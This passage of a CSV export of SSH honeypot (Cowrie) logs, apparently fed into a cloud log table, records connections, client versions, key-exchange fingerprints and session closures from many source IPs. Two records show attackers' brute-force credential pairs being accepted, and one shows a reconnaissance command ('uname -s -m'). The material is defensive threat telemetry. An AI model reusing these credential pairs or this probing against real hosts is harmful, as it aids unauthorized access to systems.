SSH-2.0-libssh_0.9.6"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.708498Z"",""src_ip"":""2.228.25.92"",""session"":""1124547e066c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.822 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""f555226df1963d1d3c09daf865abdc9a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group18-sha512"",""diffie-hellman-group16-sha512"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519"",""ecdsa-sha2-nistp521"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp256"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes256-gcm@openssh.com"",""aes128-gcm@openssh.com"",""aes256-ctr"",""aes192-ctr"",""aes128-ctr"",""aes256-cbc"",""aes192-cbc"",""aes128-cbc"",""3des-cbc""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 
f555226df1963d1d3c09daf865abdc9a"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.820076Z"",""src_ip"":""2.228.25.92"",""session"":""1124547e066c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:22.309 AM",,"{""eventid"":""cowrie.login.success"",""username"":""user1"",""password"":""3245gs5662d34"",""message"":""login attempt [user1/3245gs5662d34] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:22.308168Z"",""src_ip"":""2.228.25.92"",""session"":""1124547e066c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:22.422 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.7138738632202148,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:22.422110Z"",""src_ip"":""2.228.25.92"",""session"":""1124547e066c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:22.429 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.1245369911193848,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:22.428499Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:54.906 
PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""101.126.4.240"",""src_port"":19476,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""3928b65a9140"",""protocol"":""ssh"",""message"":""New connection: 101.126.4.240:19476 (10.0.0.4:2222) [session: 3928b65a9140]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:54.905469Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:55.165 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.25769805908203125,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:55.164672Z"",""src_ip"":""101.126.4.240"",""session"":""3928b65a9140""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:56.154 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""101.126.4.240"",""src_port"":19486,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""700ced9a0ee0"",""protocol"":""ssh"",""message"":""New connection: 101.126.4.240:19486 (10.0.0.4:2222) [session: 700ced9a0ee0]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:56.153651Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:56.156 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:56.155282Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:56.739 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""98f63c4d9c87edbd97ed4747fa031019"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-256"",""rsa-sha2-512"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:56.737227Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:57.526 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""---fuck_you----"",""message"":""login attempt [root/---fuck_you----] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:57.525264Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:58.071 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:58.069500Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:58.072 PM",,"{""eventid"":""cowrie.command.input"",""input"":""uname -s -m"",""message"":""CMD: uname -s -m"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:58.072154Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:58.333 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906"",""size"":13,""shasum"":""6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906"",""duplicate"":false,""duration"":0.2629971504211426,""message"":""Closing TTY Log: 
var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:58.332159Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:17:58.335 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":2.1791365146636963,""message"":""Connection lost after 2 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:17:58.334319Z"",""src_ip"":""101.126.4.240"",""session"":""700ced9a0ee0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:26:51.918 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":188.06439566612244,""message"":""Connection lost after 188 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:26:51.914454Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:51.590 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""87.236.176.42"",""src_port"":60653,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9a8677747b53"",""protocol"":""ssh"",""message"":""New connection: 87.236.176.42:60653 (10.0.0.4:2222) [session: 9a8677747b53]"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:51.588939Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:53.589 
PM",,"{""eventid"":""cowrie.session.closed"",""duration"":1.9982540607452393,""message"":""Connection lost after 1 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.588657Z"",""src_ip"":""87.236.176.42"",""session"":""9a8677747b53""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:53.674 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""87.236.176.42"",""src_port"":35191,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""02d153b61bd2"",""protocol"":""ssh"",""message"":""New connection: 87.236.176.42:35191 (10.0.0.4:2222) [session: 02d153b61bd2]"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.673663Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:53.676 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.675081Z"",""src_ip"":""87.236.176.42"",""session"":""02d153b61bd2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:43:53.764 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""0a07365cc01fa9fc82608ba4019af499"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c"",""kex-strict-c-v00@openssh.com""],""keyAlgs"":[""rsa-sha2-256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-256"",""rsa-sha2-512"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.762282Z"",""src_ip"":""87.236.176.42"",""session"":""02d153b61bd2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" 
+"9/20/2024, 5:43:53.853 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.17725467681884766,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:43:53.852297Z"",""src_ip"":""87.236.176.42"",""session"":""02d153b61bd2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:58:10.833 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""42.240.129.244"",""src_port"":40466,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""0d826c74bc43"",""protocol"":""ssh"",""message"":""New connection: 42.240.129.244:40466 (10.0.0.4:2222) [session: 0d826c74bc43]"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:58:10.832542Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:29:24.000 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""20.57.171.170"",""src_port"":57046,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""3fc2f9ed3324"",""protocol"":""ssh"",""message"":""New connection: 20.57.171.170:57046 (10.0.0.4:2222) [session: 3fc2f9ed3324]"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:29:23.999154Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:29:24.071 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.07033920288085938,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:29:24.070998Z"",""src_ip"":""20.57.171.170"",""session"":""3fc2f9ed3324""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:15:50.427 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.84.89.2"",""src_port"":63058,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""3471e950dd1f"",""protocol"":""ssh"",""message"":""New connection: 45.84.89.2:63058 (10.0.0.4:2222) [session: 3471e950dd1f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:15:50.425819Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:15:53.988 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.560526132583618,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:15:53.987946Z"",""src_ip"":""45.84.89.2"",""session"":""3471e950dd1f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:51:46.591 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""112.54.220.94"",""src_port"":36360,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""4b21d59e7368"",""protocol"":""ssh"",""message"":""New connection: 112.54.220.94:36360 (10.0.0.4:2222) [session: 4b21d59e7368]"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:51:46.590844Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:53:46.636 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":120.0426721572876,""message"":""Connection lost after 120 
seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:53:46.634793Z"",""src_ip"":""112.54.220.94"",""session"":""4b21d59e7368""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:28:41.095 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""207.188.172.51"",""src_port"":55598,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""43c1a5f0a221"",""protocol"":""ssh"",""message"":""New connection: 207.188.172.51:55598 (10.0.0.4:2222) [session: 43c1a5f0a221]"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:28:41.094738Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:28:47.282 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":6.185498237609863,""message"":""Connection lost after 6 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:28:47.281505Z"",""src_ip"":""207.188.172.51"",""session"":""43c1a5f0a221""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:29:08.447 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""207.188.172.51"",""src_port"":58294,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""8cece0526130"",""protocol"":""ssh"",""message"":""New connection: 207.188.172.51:58294 (10.0.0.4:2222) [session: 8cece0526130]"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:29:08.446441Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:29:11.290 
AM",,"{""eventid"":""cowrie.session.closed"",""duration"":2.8417232036590576,""message"":""Connection lost after 2 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:29:11.289538Z"",""src_ip"":""207.188.172.51"",""session"":""8cece0526130""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:39:48.152 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""147.185.132.15"",""src_port"":65534,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""57871ad6de73"",""protocol"":""ssh"",""message"":""New connection: 147.185.132.15:65534 (10.0.0.4:2222) [session: 57871ad6de73]"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:39:48.151232Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:39:49.068 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:39:49.066655Z"",""src_ip"":""147.185.132.15"",""session"":""57871ad6de73""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:39:49.800 
AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hma
c-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:39:49.797930Z"",""src_ip"":""147.185.132.15"",""session"":""57871ad6de73""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:39:51.655 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.5023977756500244,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:39:51.655004Z"",""src_ip"":""147.185.132.15"",""session"":""57871ad6de73""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:14:26.977 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":120.0013518333435,""message"":""Connection lost after 120 